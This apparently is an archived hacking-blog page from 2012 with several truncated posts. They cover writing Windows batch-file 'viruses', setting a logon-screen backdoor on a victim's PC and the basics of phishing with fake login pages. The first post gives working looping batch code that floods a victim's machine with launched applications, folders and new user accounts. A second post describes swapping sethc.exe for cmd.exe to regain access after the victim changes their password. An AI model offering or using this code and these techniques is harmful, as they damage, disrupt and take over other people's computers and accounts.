Friday, 10 August 2012

TRICKS TO CREATE VIRUSES USING BATCH FILES

Batch Files - the Art of Creating Viruses

Just paste the codes in notepad and save files with extension .bat and your deadly batch viruses would be ready. But instead of that, let’s focus on making the basics of batch files clear and developing the approach to code your own viruses.

What are Batch Files?                                          



Let’s begin with a simple example , Open your command prompt and change your current directory to 'desktop' by typing 'cd desktop' without quotes.

Now type these commands one by one
1. md x  //makes directory 'x' on desktop
2. cd x  // changes current directory to 'x'
3. md y // makes a directory 'y' in directory 'x'     


We first make a folder/directory 'x', then enter in folder  'x',then make a folder 'y' in folder 'x' . 
Now delete the folder 'x'.
Let’s do the same thing in another way. Copy these three commands in  notepad and save file as anything.bat                         


 Now just double click on this batch file and the same work would be done , You will get a folder 'x' on your desktop and folder 'y' in it. This means the three commands executed line by line when we ran the batch file 

So a batch file is simply a text containing series of commands which are executed automatically line by line when the batch file is run. 

What can batch viruses do?

They can be used to delete the windows files,format data,steal information,irritate victim, consume CPU resources to affect performance,disable firewalls,open ports,modify or destroy registry and for many more purposes.

Now let’s start with simple codes, Just copy the code to notepad and save it as anything.bat (Name can be anything you wish but extension must be bat and save it as 'all files' instead of text files).

Note: Type 'help' in command prompt to know about some basic commands and to know about using a particular command , type 'command_name /?' without quotes.

1.Application Bomber

@echo off // It instructs to hide the commands when batch files is executed
:x   //loop variable
start winword 
start mspaint  //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop

This code when executed will start open different applications like paint,notepad,command prompt repeatedly, irritating victim and ofcourse affecting performance. 

2. Folder flooder
@echo off
:x
md %random% // makes directory/folder. 
goto x

Here %random% is a variable that would generate a positive no. randomly.  So this code would make start creating folders whose name can be any random number. 

3.User account flooder 
@echo off
:x
net user %random% /add //create user account
goto x

This code would start creating windows user accounts whose names could be any random numbers. 

4.Shutdown Virus

Sunday, 29 July 2012

Setting Backdoor in Windows ~ Command Prompt On Logon Screen

Setting Backdoor in Windows ~ Command Prompt On Logon Screen



Let’s assume that you have just cracked victim's windows password or simply got access to his windows for some time. Can you make some changes in windows so that you could access the windows again even if victim changes the password ?? or Can you make any changes in your own windows so that you could access it anytime even if anybody sets/changes password ?
Simply Can we set a backdoor in windows ?

 
Yes…..!!!!

Backdoor actually means maintaining access.
okay  lets do one thing first. Open your command prompt (run as administrator in win 7/vista).

Type the following command :

Syntax : net user account.name *
Example: net user administrator *
and hit enter. Set any password for that account.
                                 
Hopefully your new password must have been set did you notice one thing ? It didn't ask you to confirm old password. Now suppose if anyhow we manage to access command prompt at logon screen (without logging in), we can easily change/clear password.  
Okay lets move on.
Now press shift key five times and you must have got a dialog box "sticky keys" on screen.
 
Sticky keys  is a feature that makes it easy for users who have physical  disabilities to press multiple keys at time.   This is the only feature which can be used before logging in at logon screen . So, this feature can be used at  logon screen by pressing shift key five times.
Whenever we start an application like paint, we are actually running mspaint.exe placed in C:\windows\system32  or command prompt, we are running cmd.exe placed in system32 directory, similary
When we press shift key 5 times or use sticky keys feature, system actually starts the executable file
sethc.exe placed in system32 directory. This means if we rename cmd.exe to sethc.exe and press shift 5 times, system would again start sethc.exe but instead of sticky keys the command prompt will be opened.
But you just can’t simply rename it or change system32 files. To do that follow the steps given below:-.

Friday, 27 July 2012

Phishing - the basics

Phishing - the basics

What is phishing? 

Phishing is a technique of obtaining sensitive data such username,password,credit card details etc by an attacker by claiming to be a trusted or genuine organisation/company. 
The most common type of phishing is Fake Login Pages. The basic methodology of this attack is written below



1.Suppose an attacker wants to hack gmail/yahoo/facebook/bank account of the victim. Attacker creates a fake login page of that website . This fake login page looks exactly like real/genuine login page.

2.Attacker then sends the link of that fake login page to victim through an email or any other means.The sender's email Id is usually spoofed to give an authentic look to it. 

Tuesday, 24 July 2012

Reality Behind Hacking Facebook, Orkut, Gmail, Yahoo Accounts


Reality Behind Hacking Facebook, Orkut, Gmail, Yahoo Accounts

This is a must read post for the beginners and newbies who have just started exploring hacking and for laymen who aren't interested in learning hacking but needs somebody's account password anyhow. So, you have to be aware about common misconceptions regarding Email/Social Networking Sites accounts hacking.

Otherwise those thoughts/misconceptions can seriously put you in trouble.
We usually start like googling this, "how to hack gmail account" , "
softwares for hacking orkut " ,"how to hack facebook account" etc
but unfortunately reach some malicious websites,
follow stupid instructions and our own accounts get compromised.


Suppose you just have signed up for an account(gmail,yahoo or any other reputed website)
Your password is stored only at two places
1. In website's database
2. In your mind
(Dont say a stupid thing that it is also saved in a text file on your
PC,etc.)
                                                                                  By simply knowing someone facebook/gmail account id you just cannot hack somebody's account.
Fetching your credentials (Id/password) from website's database is almost impossible.
They are paynig million of dollars for securing their systems and they are not such fools out there.
Here It is to  remind you that, We are talking only about the reputed companies like microsoft,google,facebook etc.
Hard Core hackers might get success in compromising their systems but it need some special art.

Now talking about your mind, its might be really very simple to do this. Shocked ?
At this ponit,
So, Hacking an email account depends strongly on carelessness/foolishness of victim.